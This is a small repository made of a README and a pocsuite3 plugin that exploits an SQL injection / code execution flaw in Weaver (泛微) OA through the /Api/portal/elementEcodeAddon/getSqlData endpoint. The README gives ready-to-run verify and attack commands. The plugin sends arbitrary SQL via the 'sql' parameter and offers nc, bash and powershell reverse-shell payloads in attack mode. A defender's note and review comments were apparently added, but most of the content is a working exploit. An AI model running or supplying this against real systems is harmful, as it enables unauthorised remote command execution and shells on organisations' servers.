├── README.md
└── weaverOA_sql_injection_POC_EXP.py

/README.md:
--------------------------------------------------------------------------------
# weaverOA_sql_RCE
## 泛微OA某版本的SQL代码执行漏洞
### 2022.04.20
经过测试,该漏洞属于泛微OA MSSQL远程代码执行漏洞。
测试如图:
![1650428637(1)](https://user-images.githubusercontent.com/54984589/164150112-b8ef1ee8-ff9a-4509-b75f-c73f199a5be9.png)

POC:
PS:url结尾不能有[/],例如:http://127.0.0.1:8080,不能为http://127.0.0.1:8080/

Note: the URL must not end with a trailing slash, e.g. http://127.0.0.1:8080, not http://127.0.0.1:8080/

pocsuite -r weaverOA_sql_injection_POC_EXP.py -u url --verify

![1648651245(1)](https://user-images.githubusercontent.com/54984589/160861695-53c75697-6b88-41fb-bcc7-c1a49c8e2dec.png)

EXP: pocsuite -r weaverOA_sql_injection_POC_EXP.py -u url --attack --command "[command]"

PS:url结尾不能有[/],例如:http://127.0.0.1:8080,不能为http://127.0.0.1:8080/

Note: the URL must not end with a trailing slash, e.g. http://127.0.0.1:8080, not http://127.0.0.1:8080/

![1648651381(1)](https://user-images.githubusercontent.com/54984589/160862217-45fe5a02-d6ab-4731-adb1-8b20ebcf2130.png)
# 免责声明
## 此工具仅用于学习、研究和自查。不应将其用于非法目的。使用本工具产生的一切风险与我无关!
# Disclaimer
## This tool is for study, research and self-audit only. It should not be used for illegal purposes. All risks arising from the use of this tool have nothing to do with me!
# File: weaverOA_sql_injection_POC_EXP.py
# NOTE(review): the shebang below has a space after '#', so it is not a valid
# shebang line; the file is only loadable through `pocsuite -r`, not directly.
# !/usr/bin/env python
# -*- coding: UTF-8 -*-
import json
import time
import base64
from collections import OrderedDict
from urllib.parse import urlparse, urljoin
from urllib.parse import quote,unquote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptDict
from pocsuite3.modules.listener import REVERSE_PAYLOAD

# NOTE(review): `time`, `base64`, `quote` and `unquote` are imported but never
# used anywhere in this module.


class weaverOA_sql_injection(POCBase):
    """pocsuite3 plugin for a SQL-injection / code-execution issue in Weaver (泛微) OA.

    The single request this plugin makes goes to
    ``/Api/portal/elementEcodeAddon/getSqlData`` with the statement in the
    ``sql`` query parameter (see ``_check``). The README on this page reports
    the backend as MSSQL, and the default verify probe is a T-SQL
    ``WAITFOR DELAY``. ``references``, ``appVersion`` and ``samples`` are left
    blank by the author, so affected and fixed versions are not recorded here.

    Defender's note: the indicator this plugin keys on is an HTTP 200 whose
    body contains ``"api_status":true``; on the request side, any hit on the
    path above carrying a ``sql`` parameter is what to alert on.
    """
    vulID = 'weaverOA_sql_injection'
    version = '1.0'
    author = ['Warin9_0']
    vulDate = '2022-03-29'
    createDate = '2022-03-29'
    updateDate = '2022-03-29'
    references = ['']  # no advisory / CVE recorded by the author
    name = 'weaverOA_sql_injection'
    appPowerLink = ''
    appName = '泛微OA'
    appVersion = """The unknown"""  # affected version range not recorded
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''fanwei_sql_injection'''
    samples = ['']
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _options(self) -> OrderedDict:
        """Declare the ``command`` option consumed by ``_attack``.

        The selectable values are the pocsuite3 ``REVERSE_PAYLOAD`` templates
        keyed ``nc``, ``bash`` and ``powershell``; ``bash`` is selected by
        default.
        """
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
            "powershell": REVERSE_PAYLOAD.POWERSHELL,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o

    def _check(self, url: str, cmd: str = ""):
        """Send ``cmd`` to the getSqlData endpoint and report whether it was accepted.

        Args:
            url: Target base URL (the README says it must not end with ``/``).
            cmd: Text placed as-is into the ``sql`` query parameter. When empty,
                a 3-second T-SQL ``WAITFOR DELAY`` is used as the probe.

        Returns:
            ``(vul_url, data)`` -- the full request URL and the ``data`` field of
            the JSON body -- when the response is HTTP 200 and its text contains
            ``"api_status":true``. ``False`` on any request exception, on any
            other response, or when the body does not parse as JSON.
        """
        self.timeout = 5  # per-request timeout (seconds) for requests.get below
        cmd = cmd or "WAITFOR DELAY '00:00:03'"  # empty cmd -> time-based probe
        # Injection point: cmd is interpolated into the query string without
        # URL encoding (quote/unquote are imported but unused).
        path = "/Api/portal/elementEcodeAddon/getSqlData?sql={}".format(cmd)
        vul_url = urljoin(url, path)
        # Console echo of the payload in red (ANSI escapes); not part of the request.
        print("\033[1;31m\npayload:" + cmd + '\033[0m\n')
        parse = urlparse(vul_url)
        headers = {
            "Host": "{}".format(parse.netloc),  # only Host is set explicitly
        }
        try:
            # TLS certificate verification is disabled for this request.
            r = requests.get(vul_url, timeout=self.timeout, headers=headers, verify=False)
        except Exception:
            # Any transport error (timeout, refused connection, ...) counts as not vulnerable.
            return False
        else:
            if '"api_status":true' in r.text and r.status_code == 200:
                url = vul_url
                try:
                    cmd_result = json.loads(r.text).get('data')
                    return url,cmd_result
                except Exception:
                    # NOTE(review): this assignment is dead -- the branch falls
                    # through to `return False`, so a 200 carrying the marker but
                    # a non-JSON body is reported as not vulnerable.
                    cmd_result = r.text
                return False

            # Marker absent, or status other than 200.
            return False

    def _verify(self) -> Output:
        """Run the default time-based probe and wrap the result as pocsuite Output."""
        result: dict = {}
        p = self._check(self.url)
        if p:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = p[0]
            result['VerifyInfo']['Command executed successfully'] = p[1]

        return self.parse_output(result)

    def _attack(self) -> Output:
        """Run the operator-selected ``command`` option through ``_check``.

        Reporting is identical to ``_verify``; only the probe text differs.
        """
        result: dict = {}
        command = self.get_option("command")
        # The selected payload template is passed verbatim as the sql parameter.
        p = self._check(self.url, cmd=command)
        if p:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = p[0]
            result['VerifyInfo']['Command executed successfully'] = p[1]

        return self.parse_output(result)

    def parse_output(self, result: dict) -> Output:
        """Convert ``result`` into a pocsuite ``Output``.

        A non-empty dict is reported as success; an empty one as
        'url is not vulnerable'.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('url is not vulnerable')
        return output


# Registers the class with pocsuite3 so `pocsuite -r <this file>` can load it.
register_poc(weaverOA_sql_injection)